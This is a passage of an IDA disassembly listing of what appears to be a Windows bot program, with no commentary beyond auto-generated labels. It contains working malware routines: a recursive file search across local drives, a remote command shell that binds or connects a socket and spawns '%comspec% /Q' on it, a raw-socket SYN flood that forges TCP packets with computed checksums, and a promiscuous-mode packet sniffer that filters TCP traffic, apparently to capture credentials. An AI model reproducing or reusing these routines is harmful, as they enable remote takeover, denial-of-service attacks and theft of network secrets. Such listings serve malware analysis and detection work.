push eax
call sub_403E5B
jmp short loc_403F1A
; ---------------------------------------------------------------------------
loc_403EE5: ; CODE XREF: sub_403E5B+1F�j
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax]
push eax
call dword_4010F0 ; CharUpperA
mov esi, eax
mov eax, [ebp+arg_4]
movzx eax, byte ptr [eax]
push eax
call dword_4010F0 ; CharUpperA
cmp esi, eax
jnz short loc_403F18
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_403E5B
jmp short loc_403F1A
; ---------------------------------------------------------------------------
dw 2EBh
; ---------------------------------------------------------------------------
loc_403F18: ; CODE XREF: sub_403E5B+A8�j
xor eax, eax
loc_403F1A: ; CODE XREF: sub_403E5B+2C�j
; sub_403E5B+46�j ...
pop esi
leave
retn 8
sub_403E5B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403F1F proc near ; CODE XREF: sub_403062+450�p
var_318 = byte ptr -318h
var_314 = byte ptr -314h
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_208 = byte ptr -208h
var_108 = dword ptr -108h
var_104 = byte ptr -104h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 108h
and [ebp+var_108], 0
push 104h
push [ebp+arg_0]
lea eax, [ebp+var_104]
push eax
call dword_4010BC ; lstrcpynA
push 0
push 0
lea eax, [ebp+var_108]
push eax
push offset loc_403F79
push 0
push 0
call dword_4010B4 ; CreateThread
test eax, eax
jz short locret_403F75
loc_403F62: ; CODE XREF: sub_403F1F+54�j
cmp [ebp+var_108], 0
jnz short locret_403F75
push 8
call dword_4010DC ; Sleep
jmp short loc_403F62
; ---------------------------------------------------------------------------
locret_403F75: ; CODE XREF: sub_403F1F+41�j
; sub_403F1F+4A�j
leave
retn 4
; ---------------------------------------------------------------------------
loc_403F79: ; DATA XREF: sub_403F1F+30�o
push ebp
mov ebp, esp
sub esp, 318h
push 108h
push [ebp+arg_0]
lea eax, [ebp+var_318]
push eax
call sub_40392B
mov eax, [ebp+arg_0]
mov dword ptr [eax], 1
lea eax, [ebp+var_208]
push eax
push 200h
call dword_401078 ; GetLogicalDriveStringsA
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_403FC3
cmp [ebp+var_4], 200h
jbe short loc_403FC7
loc_403FC3: ; CODE XREF: sub_403F1F+99�j
xor eax, eax
jmp short locret_40402F
; ---------------------------------------------------------------------------
loc_403FC7: ; CODE XREF: sub_403F1F+A2�j
lea eax, [ebp+var_208]
mov [ebp+var_20C], eax
jmp short loc_403FF1
; ---------------------------------------------------------------------------
loc_403FD5: ; CODE XREF: sub_403F1F:loc_40402B�j
push [ebp+var_20C]
call dword_401074 ; lstrlenA
mov ecx, [ebp+var_20C]
lea eax, [ecx+eax+1]
mov [ebp+var_20C], eax
loc_403FF1: ; CODE XREF: sub_403F1F+B4�j
mov eax, [ebp+var_20C]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_40402D
push [ebp+var_20C]
call dword_4010D8 ; GetDriveTypeA
mov [ebp+var_210], eax
cmp [ebp+var_210], 3
jnz short loc_40402B
lea eax, [ebp+var_314]
push eax
push [ebp+var_20C]
call sub_404033
loc_40402B: ; CODE XREF: sub_403F1F+F8�j
jmp short loc_403FD5
; ---------------------------------------------------------------------------
loc_40402D: ; CODE XREF: sub_403F1F+DD�j
xor eax, eax
locret_40402F: ; CODE XREF: sub_403F1F+A6�j
leave
retn 4
sub_403F1F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404033 proc near ; CODE XREF: sub_403F1F+107�p
; sub_404033+AB�p
var_544 = dword ptr -544h
var_540 = dword ptr -540h
var_514 = byte ptr -514h
var_400 = byte ptr -400h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 544h
push [ebp+arg_0]
push offset a_256s ; "%.256s*"
lea eax, [ebp+var_200]
push eax
call dword_401104 ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_540]
push eax
lea eax, [ebp+var_200]
push eax
call dword_401084 ; FindFirstFileA
mov [ebp+var_544], eax
cmp [ebp+var_544], 0FFFFFFFFh
jnz short loc_40407C
jmp locret_40414B
; ---------------------------------------------------------------------------
loc_40407C: ; CODE XREF: sub_404033+42�j
; sub_404033+106�j
mov eax, [ebp+var_540]
and eax, 10h
jz short loc_4040E5
push offset a_ ; "."
lea eax, [ebp+var_514]
push eax
call dword_4010AC ; lstrcmpA
test eax, eax
jz short loc_4040B3
push offset a__ ; ".."
lea eax, [ebp+var_514]
push eax
call dword_4010AC ; lstrcmpA
test eax, eax
jnz short loc_4040B5
loc_4040B3: ; CODE XREF: sub_404033+68�j
jmp short loc_404124
; ---------------------------------------------------------------------------
loc_4040B5: ; CODE XREF: sub_404033+7E�j
lea eax, [ebp+var_514]
push eax
push [ebp+arg_0]
push offset a_256s_250s ; "%.256s%.250s\\"
lea eax, [ebp+var_200]
push eax
call dword_401104 ; wsprintfA
add esp, 10h
push [ebp+arg_4]
lea eax, [ebp+var_200]
push eax
call sub_404033
jmp short loc_404124
; ---------------------------------------------------------------------------
loc_4040E5: ; CODE XREF: sub_404033+52�j
lea eax, [ebp+var_514]
push eax
push [ebp+arg_4]
call sub_403E5B
cmp eax, 1
jnz short loc_404124
lea eax, [ebp+var_514]
push eax
push [ebp+arg_0]
push offset aFindfile_256s_ ; "[findfile] %.256s%.240s"
lea eax, [ebp+var_400]
push eax
call dword_401104 ; wsprintfA
add esp, 10h
lea eax, [ebp+var_400]
push eax
call sub_402C53
loc_404124: ; CODE XREF: sub_404033:loc_4040B3�j
; sub_404033+B0�j ...
lea eax, [ebp+var_540]
push eax
push [ebp+var_544]
call dword_401080 ; FindNextFileA
test eax, eax
jnz loc_40407C
push [ebp+var_544]
call dword_40107C ; FindClose
locret_40414B: ; CODE XREF: sub_404033+44�j
leave
retn 8
sub_404033 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40414F proc near ; CODE XREF: sub_403062+437�p
var_274 = dword ptr -274h
var_270 = word ptr -270h
var_26E = word ptr -26Eh
var_26C = dword ptr -26Ch
var_260 = dword ptr -260h
var_234 = dword ptr -234h
var_230 = word ptr -230h
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_214 = dword ptr -214h
var_210 = byte ptr -210h
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 108h
and [ebp+var_108], 0
push 100h
push [ebp+arg_0]
lea eax, [ebp+var_104]
push eax
call dword_4010BC ; lstrcpynA
push 0
push 0
lea eax, [ebp+var_108]
push eax
push offset loc_4041A9
push 0
push 0
call dword_4010B4 ; CreateThread
test eax, eax
jz short locret_4041A5
loc_404192: ; CODE XREF: sub_40414F+54�j
cmp [ebp+var_108], 0
jnz short locret_4041A5
push 8
call dword_4010DC ; Sleep
jmp short loc_404192
; ---------------------------------------------------------------------------
locret_4041A5: ; CODE XREF: sub_40414F+41�j
; sub_40414F+4A�j
leave
retn 4
; ---------------------------------------------------------------------------
loc_4041A9: ; DATA XREF: sub_40414F+30�o
push ebp
mov ebp, esp
sub esp, 274h
push 100h
mov eax, [ebp+arg_0]
add eax, 4
push eax
lea eax, [ebp+var_108]
push eax
call dword_4010BC ; lstrcpynA
mov eax, [ebp+arg_0]
mov dword ptr [eax], 1
push 3Ah
lea eax, [ebp+var_108]
push eax
call sub_40395A
mov [ebp+var_214], eax
cmp [ebp+var_214], 0
jnz short loc_4041F8
xor eax, eax
jmp locret_4043B0
; ---------------------------------------------------------------------------
loc_4041F8: ; CODE XREF: sub_40414F+A0�j
mov eax, [ebp+var_214]
mov byte ptr [eax], 0
mov eax, [ebp+var_214]
inc eax
mov [ebp+var_214], eax
and word ptr [ebp+var_4], 0
jmp short loc_404222
; ---------------------------------------------------------------------------
loc_404215: ; CODE XREF: sub_40414F+104�j
mov eax, [ebp+var_214]
inc eax
mov [ebp+var_214], eax
loc_404222: ; CODE XREF: sub_40414F+C4�j
mov eax, [ebp+var_214]
movzx eax, byte ptr [eax]
test eax, eax
jz short loc_404255
movzx eax, word ptr [ebp+var_4]
imul eax, 0Ah
mov word ptr [ebp+var_4], ax
mov eax, [ebp+var_214]
movzx eax, byte ptr [eax]
sub eax, 30h
movzx eax, ax
movzx ecx, word ptr [ebp+var_4]
add ecx, eax
mov word ptr [ebp+var_4], cx
jmp short loc_404215
; ---------------------------------------------------------------------------
loc_404255: ; CODE XREF: sub_40414F+DE�j
lea eax, [ebp+var_108]
push eax
call dword_40111C ; inet_addr
mov [ebp+var_26C], eax
push [ebp+var_4]
call dword_40110C ; ntohs
mov [ebp+var_26E], ax
mov [ebp+var_270], 2
cmp [ebp+var_26C], 0
jnz short loc_4042E9
push 0
push 0
push 0
push 6
push 1
push 2
call dword_401124 ; WSASocketA
mov [ebp+var_274], eax
push 10h
lea eax, [ebp+var_270]
push eax
push [ebp+var_274]
call dword_401148 ; bind
push 0
push [ebp+var_274]
call dword_40114C ; listen
push 0
push 0
push [ebp+var_274]
call dword_401150 ; accept
mov [ebp+var_10C], eax
push [ebp+var_274]
call dword_401140 ; closesocket
jmp short loc_404316
; ---------------------------------------------------------------------------
loc_4042E9: ; CODE XREF: sub_40414F+139�j
push 0
push 0
push 0
push 6
push 1
push 2
call dword_401124 ; WSASocketA
mov [ebp+var_10C], eax
push 10h
lea eax, [ebp+var_270]
push eax
push [ebp+var_10C]
call dword_40112C ; connect
loc_404316: ; CODE XREF: sub_40414F+198�j
push 44h
lea eax, [ebp+var_260]
push eax
call sub_4038D9
mov [ebp+var_260], 44h
mov [ebp+var_234], 181h
and [ebp+var_230], 0
mov eax, [ebp+var_10C]
mov [ebp+var_224], eax
mov eax, [ebp+var_224]
mov [ebp+var_228], eax
mov eax, [ebp+var_228]
mov [ebp+var_220], eax
push 100h
lea eax, [ebp+var_210]
push eax
push offset aComspecQ ; "\"%comspec%\" /Q"
call dword_401088 ; ExpandEnvironmentStringsA
push offset aD ; "d"
lea eax, [ebp+var_260]
push eax
push 0
push 0
push 10h
push 1
push 0
push 0
lea eax, [ebp+var_210]
push eax
push 0
call dword_4010A8 ; CreateProcessA
push [ebp+var_10C]
call dword_401140 ; closesocket
xor eax, eax
locret_4043B0: ; CODE XREF: sub_40414F+A4�j
leave
retn 4
sub_40414F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4043B4 proc near ; CODE XREF: sub_403062+36D�p
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_C = word ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
push 20h
push [ebp+arg_0]
call sub_40395A
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_4043D2
jmp locret_4044BC
; ---------------------------------------------------------------------------
loc_4043D2: ; CODE XREF: sub_4043B4+17�j
mov eax, [ebp+var_4]
mov byte ptr [eax], 0
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
push 20h
push [ebp+arg_0]
lea eax, [ebp+var_2C]
push eax
call dword_4010BC ; lstrcpynA
push 20h
push [ebp+var_4]
call sub_40395A
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_404406
jmp locret_4044BC
; ---------------------------------------------------------------------------
loc_404406: ; CODE XREF: sub_4043B4+4B�j
mov eax, [ebp+var_8]
mov byte ptr [eax], 0
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
and [ebp+var_C], 0
jmp short loc_404421
; ---------------------------------------------------------------------------
loc_40441A: ; CODE XREF: sub_4043B4+98�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_404421: ; CODE XREF: sub_4043B4+64�j
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_40444E
movzx eax, [ebp+var_C]
imul eax, 0Ah
mov [ebp+var_C], ax
mov eax, [ebp+var_4]
movzx eax, byte ptr [eax]
sub eax, 30h
movzx eax, ax
movzx ecx, [ebp+var_C]
add ecx, eax
mov [ebp+var_C], cx
jmp short loc_40441A
; ---------------------------------------------------------------------------
loc_40444E: ; CODE XREF: sub_4043B4+75�j
and [ebp+var_30], 0
jmp short loc_40445B
; ---------------------------------------------------------------------------
loc_404454: ; CODE XREF: sub_4043B4+CA�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_40445B: ; CODE XREF: sub_4043B4+9E�j
mov eax, [ebp+var_8]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_404480
mov eax, [ebp+var_30]
imul eax, 0Ah
mov [ebp+var_30], eax
mov eax, [ebp+var_8]
movzx eax, byte ptr [eax]
mov ecx, [ebp+var_30]
lea eax, [ecx+eax-30h]
mov [ebp+var_30], eax
jmp short loc_404454
; ---------------------------------------------------------------------------
loc_404480: ; CODE XREF: sub_4043B4+AF�j
mov eax, [ebp+arg_4]
mov [ebp+var_34], eax
and [ebp+var_38], 0
and dword_4014CC, 0
push 0
push 0
lea eax, [ebp+var_38]
push eax
push offset loc_4044CF
push 0
push 0
call dword_4010B4 ; CreateThread
test eax, eax
jz short locret_4044BC
loc_4044AC: ; CODE XREF: sub_4043B4+106�j
cmp [ebp+var_38], 0
jnz short locret_4044BC
push 8
call dword_4010DC ; Sleep
jmp short loc_4044AC
; ---------------------------------------------------------------------------
locret_4044BC: ; CODE XREF: sub_4043B4+19�j
; sub_4043B4+4D�j ...
leave
retn 8
sub_4043B4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4044C0 proc near ; CODE XREF: sub_403062:loc_4033D9�p
push ebp
mov ebp, esp
mov dword_4014CC, 1
pop ebp
retn
sub_4044C0 endp
; ---------------------------------------------------------------------------
loc_4044CF: ; DATA XREF: sub_4043B4+E5�o
push ebp
mov ebp, esp
sub esp, 308h
push esi
push edi
mov esi, [ebp+8]
push 0Bh
pop ecx
lea edi, [ebp-2A4h]
rep movsd
movsw
mov eax, [ebp+8]
mov dword ptr [eax], 1
push 0FFh
push 3
push 2
call dword_401160 ; socket
mov [ebp-44h], eax
cmp dword ptr [ebp-44h], 0FFFFFFFFh
jnz short loc_404512
xor eax, eax
jmp loc_404862
; ---------------------------------------------------------------------------
loc_404512: ; CODE XREF: MEW:00404509�j
mov dword ptr [ebp-2ACh], 1
push 4
lea eax, [ebp-2ACh]
push eax
push 2
push 0
push dword ptr [ebp-44h]
call dword_401128 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_40453E
xor eax, eax
jmp loc_404862
; ---------------------------------------------------------------------------
loc_40453E: ; CODE XREF: MEW:00404535�j
lea eax, [ebp-298h]
push eax
call dword_40111C ; inet_addr
mov [ebp-8], eax
mov word ptr [ebp-18h], 2
and word ptr [ebp-16h], 0
mov eax, [ebp-8]
mov [ebp-14h], eax
mov dword ptr [ebp-4], 10h
lea eax, [ebp-4]
push eax
lea eax, [ebp-260h]
push eax
push dword_4014DC
call dword_401134 ; getsockname
cmp eax, 0FFFFFFFFh
jnz short loc_404589
xor eax, eax
jmp loc_404862
; ---------------------------------------------------------------------------
loc_404589: ; CODE XREF: MEW:00404580�j
call dword_4010A4 ; GetTickCount
and eax, 0FFh
shl eax, 18h
xor eax, [ebp-25Ch]
mov [ebp-1Ch], eax
mov byte ptr [ebp-40h], 45h
mov word ptr [ebp-3Eh], 2800h
mov word ptr [ebp-3Ch], 1
and word ptr [ebp-3Ah], 0
mov byte ptr [ebp-38h], 80h
mov byte ptr [ebp-37h], 6
and word ptr [ebp-36h], 0
call dword_4010A4 ; GetTickCount
xor eax, 95EC27A5h
mov [ebp-270h], eax
and dword ptr [ebp-26Ch], 0
mov byte ptr [ebp-267h], 2
mov byte ptr [ebp-268h], 50h
mov word ptr [ebp-266h], 2
and word ptr [ebp-262h], 0
and word ptr [ebp-264h], 0
mov byte ptr [ebp-24h], 0
mov byte ptr [ebp-23h], 6
mov word ptr [ebp-22h], 1400h
mov eax, [ebp-8]
mov [ebp-30h], eax
mov eax, [ebp-8]
mov [ebp-28h], eax
mov eax, [ebp-1Ch]
mov [ebp-34h], eax
mov eax, [ebp-1Ch]
mov [ebp-2Ch], eax
movzx eax, word ptr [ebp-278h]
test eax, eax
jnz short loc_404646
call dword_4010A4 ; GetTickCount
and eax, 0FFFFh
mov [ebp-272h], ax
jmp short loc_404659
; ---------------------------------------------------------------------------
loc_404646: ; CODE XREF: MEW:00404630�j
push dword ptr [ebp-278h]
call dword_40110C ; ntohs
mov [ebp-272h], ax
loc_404659: ; CODE XREF: MEW:00404644�j
call dword_4010A4 ; GetTickCount
and eax, 0FFFFh
xor eax, 82E4h
mov [ebp-274h], ax
push 0Ch
lea eax, [ebp-2Ch]
push eax
lea eax, [ebp-2E8h]
push eax
call sub_40392B
push 14h
lea eax, [ebp-274h]
push eax
lea eax, [ebp-2DCh]
push eax
call sub_40392B
push 20h
lea eax, [ebp-2E8h]
push eax
call sub_404868
mov [ebp-2CCh], ax
push 14h
lea eax, [ebp-40h]
push eax
lea eax, [ebp-2F0h]
push eax
call sub_40392B
push 28h
lea eax, [ebp-2F0h]
push eax
call sub_404868
mov [ebp-2E6h], ax
mov dword ptr [ebp-48h], 1
call dword_4010A4 ; GetTickCount
mov [ebp-250h], eax
mov eax, [ebp-29Ch]
imul eax, 3E8h
add eax, [ebp-250h]
mov [ebp-24Ch], eax
push 10h
lea eax, [ebp-18h]
push eax
push 0
push 28h
lea eax, [ebp-2F0h]
push eax
push dword ptr [ebp-44h]
call dword_401110 ; sendto
cmp eax, 0FFFFFFFFh
jnz short loc_404724
xor eax, eax
jmp loc_404862
; ---------------------------------------------------------------------------
loc_404724: ; CODE XREF: MEW:0040471B�j
; MEW:004047AC�j
call dword_4010A4 ; GetTickCount
cmp eax, [ebp-24Ch]
jnb short loc_4047B1
cmp dword_4014CC, 0
jnz short loc_4047B1
push 10h
lea eax, [ebp-18h]
push eax
push 0
push 28h
lea eax, [ebp-2F0h]
push eax
push dword ptr [ebp-44h]
call dword_401110 ; sendto
push 10h
lea eax, [ebp-18h]
push eax
push 0
push 28h
lea eax, [ebp-2F0h]
push eax
push dword ptr [ebp-44h]
call dword_401110 ; sendto
push 10h
lea eax, [ebp-18h]
push eax
push 0
push 28h
lea eax, [ebp-2F0h]
push eax
push dword ptr [ebp-44h]
call dword_401110 ; sendto
push 10h
lea eax, [ebp-18h]
push eax
push 0
push 28h
lea eax, [ebp-2F0h]
push eax
push dword ptr [ebp-44h]
call dword_401110 ; sendto
mov eax, [ebp-48h]
add eax, 4
mov [ebp-48h], eax
jmp loc_404724
; ---------------------------------------------------------------------------
loc_4047B1: ; CODE XREF: MEW:00404730�j
; MEW:00404739�j
call dword_4010A4 ; GetTickCount
sub eax, [ebp-250h]
mov [ebp-2A8h], eax
push dword ptr [ebp-44h]
call dword_401140 ; closesocket
cmp dword ptr [ebp-2A0h], 0
jnz loc_404860
mov eax, [ebp-48h]
imul eax, 28h
mov [ebp-20h], eax
mov eax, [ebp-20h]
shr eax, 0Ah
mov [ebp-2F8h], eax
and dword ptr [ebp-2F4h], 0
fild qword ptr [ebp-2F8h]
mov eax, [ebp-2A8h]
mov [ebp-300h], eax
and dword ptr [ebp-2FCh], 0
fild qword ptr [ebp-300h]
fdivp st(1), st
fmul dbl_401B88
fistp qword ptr [ebp-308h]
push dword ptr [ebp-308h]
mov eax, [ebp-20h]
shr eax, 14h
push eax
push dword ptr [ebp-48h]
push dword ptr [ebp-2A8h]
lea eax, [ebp-298h]
push eax
push offset aSyn_16sDoneUms ; "[syn:%.16s] done [%ums] [%u packets] [%"...
lea eax, [ebp-248h]
push eax
call dword_401104 ; wsprintfA
add esp, 1Ch
lea eax, [ebp-248h]
push eax
call sub_402C53
loc_404860: ; CODE XREF: MEW:004047D3�j
xor eax, eax
loc_404862: ; CODE XREF: MEW:0040450D�j
; MEW:00404539�j ...
pop edi
pop esi
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404868 proc near ; CODE XREF: MEW:004046A0�p
; MEW:004046C7�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
loc_404870: ; CODE XREF: sub_404868+2A�j
cmp [ebp+arg_4], 2
jb short loc_404894
mov eax, [ebp+arg_0]
movzx eax, word ptr [eax]
add eax, [ebp+var_4]
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+arg_4]
dec eax
dec eax
mov [ebp+arg_4], eax
jmp short loc_404870
; ---------------------------------------------------------------------------
loc_404894: ; CODE XREF: sub_404868+C�j
cmp [ebp+arg_4], 0
jz short loc_4048A6
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax]
add eax, [ebp+var_4]
mov [ebp+var_4], eax
loc_4048A6: ; CODE XREF: sub_404868+30�j
mov eax, [ebp+var_4]
shr eax, 10h
mov ecx, [ebp+var_4]
and ecx, 0FFFFh
add eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shr eax, 10h
add eax, [ebp+var_4]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
not eax
leave
retn 8
sub_404868 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4048CF proc near ; CODE XREF: sub_403062:loc_4033A6�p
push ebp
mov ebp, esp
cmp dword_401688, 1
jnz short loc_4048F7
and dword_401688, 0
push 0
push 0
push 0
push offset loc_404908
push 0
push 0
call dword_4010B4 ; CreateThread
loc_4048F7: ; CODE XREF: sub_4048CF+A�j
pop ebp
retn
sub_4048CF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4048F9 proc near ; CODE XREF: sub_403062:loc_4033B0�p
push ebp
mov ebp, esp
mov dword_401688, 1
pop ebp
retn
sub_4048F9 endp
; ---------------------------------------------------------------------------
loc_404908: ; DATA XREF: sub_4048CF+19�o
push ebp
mov ebp, esp
sub esp, 1F8h
mov dword ptr [ebp-10h], 10h
lea eax, [ebp-10h]
push eax
lea eax, [ebp-1F8h]
push eax
push dword_4014DC
call dword_401134 ; getsockname
cmp eax, 0FFFFFFFFh
jnz short loc_40493B
xor eax, eax
jmp locret_404C4D
; ---------------------------------------------------------------------------
loc_40493B: ; CODE XREF: MEW:00404932�j
and word ptr [ebp-1F6h], 0
push 0
push 3
push 2
call dword_401160 ; socket
mov [ebp-38h], eax
cmp dword ptr [ebp-38h], 0FFFFFFFFh
jnz short loc_40495F
xor eax, eax
jmp locret_404C4D
; ---------------------------------------------------------------------------
loc_40495F: ; CODE XREF: MEW:00404956�j
push 10h
lea eax, [ebp-1F8h]
push eax
push dword ptr [ebp-38h]
call dword_401148 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_404986
push dword ptr [ebp-38h]
call dword_401140 ; closesocket
xor eax, eax
jmp locret_404C4D
; ---------------------------------------------------------------------------
loc_404986: ; CODE XREF: MEW:00404974�j
mov dword ptr [ebp-14h], 1
push 0
push 0
lea eax, [ebp-44h]
push eax
push 0
push 0
push 4
lea eax, [ebp-14h]
push eax
push 98000001h
push dword ptr [ebp-38h]
call dword_401118 ; WSAIoctl
cmp eax, 0FFFFFFFFh
jnz short loc_4049C2
push dword ptr [ebp-38h]
call dword_401140 ; closesocket
xor eax, eax
jmp locret_404C4D
; ---------------------------------------------------------------------------
loc_4049C2: ; CODE XREF: MEW:004049B0�j
push 10000h
push 0
call dword_401090 ; GlobalAlloc
mov [ebp-48h], eax
mov eax, [ebp-48h]
mov [ebp-34h], eax
loc_4049D8: ; CODE XREF: MEW:004049FD�j
; MEW:00404A0B�j ...
cmp dword_401688, 0
jnz loc_404C42
push 0
push 10000h
push dword ptr [ebp-48h]
push dword ptr [ebp-38h]
call dword_40113C ; recv
cmp eax, 0FFFFFFFFh
jnz short loc_4049FF
jmp short loc_4049D8
; ---------------------------------------------------------------------------
loc_4049FF: ; CODE XREF: MEW:004049FB�j
mov eax, [ebp-34h]
movzx eax, byte ptr [eax+9]
cmp eax, 6
jz short loc_404A0D
jmp short loc_4049D8
; ---------------------------------------------------------------------------
loc_404A0D: ; CODE XREF: MEW:00404A09�j
mov eax, [ebp-34h]
movzx eax, byte ptr [eax]
and eax, 0Fh
shl eax, 2
mov [ebp-40h], eax
cmp dword ptr [ebp-40h], 3Ch
jbe short loc_404A24
jmp short loc_4049D8
; ---------------------------------------------------------------------------
loc_404A24: ; CODE XREF: MEW:00404A20�j
mov eax, [ebp-34h]
mov ax, [eax+2]
push eax
call dword_401114 ; ntohs
movzx eax, ax
mov [ebp-4Ch], eax
mov eax, [ebp-48h]
add eax, [ebp-40h]
mov [ebp-60h], eax
mov eax, [ebp-60h]
movzx eax, byte ptr [eax+0Ch]
sar eax, 4
shl eax, 2
mov [ebp-30h], eax
mov eax, [ebp-40h]
add eax, [ebp-30h]
mov [ebp-8], eax
mov eax, [ebp-8]
cmp eax, [ebp-4Ch]
jb short loc_404A67
jmp loc_4049D8
; ---------------------------------------------------------------------------
loc_404A67: ; CODE XREF: MEW:00404A60�j
mov eax, [ebp-4Ch]
sub eax, [ebp-8]
mov [ebp-3Ch], eax
mov eax, [ebp-60h]
mov ax, [eax]
push eax
call dword_401114 ; ntohs
mov [ebp-4], ax
mov eax, [ebp-60h]
mov ax, [eax+2]
push eax
call dword_401114 ; ntohs
mov [ebp-28h], ax
movzx eax, word ptr [ebp-4]
cmp eax, 50h
jz short loc_404ADF
movzx eax, word ptr [ebp-28h]
cmp eax, 50h
jz short loc_404ADF
movzx eax, word ptr [ebp-4]
cmp eax, 19h
jz short loc_404ADF
movzx eax, word ptr [ebp-28h]
cmp eax, 19h
jz short loc_404ADF
movzx eax, word ptr [ebp-4]
cmp eax, 6Eh
jz short loc_404ADF
movzx eax, word ptr [ebp-28h]
cmp eax, 6Eh
jz short loc_404ADF
movzx eax, word ptr [ebp-4]
cmp eax, 8Bh
jz short loc_404ADF
movzx eax, word ptr [ebp-28h]
cmp eax, 8Bh
jnz short loc_404AE4
loc_404ADF: ; CODE XREF: MEW:00404A9A�j
; MEW:00404AA3�j ...
jmp loc_4049D8
; ---------------------------------------------------------------------------
loc_404AE4: ; CODE XREF: MEW:00404ADD�j
mov eax, [ebp-48h]
add eax, [ebp-8]
mov [ebp-1E8h], eax
mov eax, [ebp-1E8h]
add eax, [ebp-3Ch]
mov byte ptr [eax], 0
and dword ptr [ebp-1E4h], 0
and dword ptr [ebp-2Ch], 0
jmp short loc_404B10
; ---------------------------------------------------------------------------
loc_404B09: ; CODE XREF: MEW:loc_404B75�j
mov eax, [ebp-2Ch]
inc eax
mov [ebp-2Ch], eax
loc_404B10: ; CODE XREF: MEW:00404B07�j
mov eax, [ebp-2Ch]
cmp eax, [ebp-3Ch]
jnb short loc_404B77
mov eax, [ebp-1E8h]
add eax, [ebp-2Ch]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_404B39
mov eax, [ebp-1E8h]
add eax, [ebp-2Ch]
movsx eax, byte ptr [eax]
cmp eax, 7Fh
jle short loc_404B47
loc_404B39: ; CODE XREF: MEW:00404B26�j
mov dword ptr [ebp-1E4h], 1
jmp short loc_404B77
; ---------------------------------------------------------------------------
db 0EBh, 2Eh
; ---------------------------------------------------------------------------
loc_404B47: ; CODE XREF: MEW:00404B37�j
mov eax, [ebp-1E8h]
add eax, [ebp-2Ch]
movsx eax, byte ptr [eax]
cmp eax, 0Dh
jz short loc_404B69
mov eax, [ebp-1E8h]
add eax, [ebp-2Ch]
movsx eax, byte ptr [eax]
cmp eax, 0Ah
jnz short loc_404B75
loc_404B69: ; CODE XREF: MEW:00404B56�j
mov eax, [ebp-1E8h]
add eax, [ebp-2Ch]
mov byte ptr [eax], 20h
loc_404B75: ; CODE XREF: MEW:00404B67�j
jmp short loc_404B09
; ---------------------------------------------------------------------------
loc_404B77: ; CODE XREF: MEW:00404B16�j
; MEW:00404B43�j
cmp dword ptr [ebp-1E4h], 1
jnz short loc_404B85
jmp loc_4049D8
; ---------------------------------------------------------------------------
loc_404B85: ; CODE XREF: MEW:00404B7E�j
push offset dword_4016F8
push dword ptr [ebp-1E8h]
call sub_40398B
test eax, eax
jz short loc_404B9E
jmp loc_4049D8
; ---------------------------------------------------------------------------
loc_404B9E: ; CODE XREF: MEW:00404B97�j
push dword ptr [ebp-1E8h]
call sub_404C51
cmp eax, 1
jnz loc_404C3D
mov eax, [ebp-34h]
push dword ptr [eax+0Ch]
call dword_401164 ; inet_ntoa
mov [ebp-0Ch], eax
cmp dword ptr [ebp-0Ch], 0
jnz short loc_404BCC
jmp loc_4049D8
; ---------------------------------------------------------------------------
loc_404BCC: ; CODE XREF: MEW:00404BC5�j
push 10h
push dword ptr [ebp-0Ch]
lea eax, [ebp-5Ch]
push eax
call dword_4010BC ; lstrcpynA
mov eax, [ebp-34h]
push dword ptr [eax+10h]
call dword_401164 ; inet_ntoa
mov [ebp-0Ch], eax
cmp dword ptr [ebp-0Ch], 0
jnz short loc_404BF5
jmp loc_4049D8
; ---------------------------------------------------------------------------
loc_404BF5: ; CODE XREF: MEW:00404BEE�j
push 10h
push dword ptr [ebp-0Ch]
lea eax, [ebp-24h]
push eax
call dword_4010BC ; lstrcpynA
push dword ptr [ebp-1E8h]
movzx eax, word ptr [ebp-28h]
push eax
lea eax, [ebp-24h]
push eax
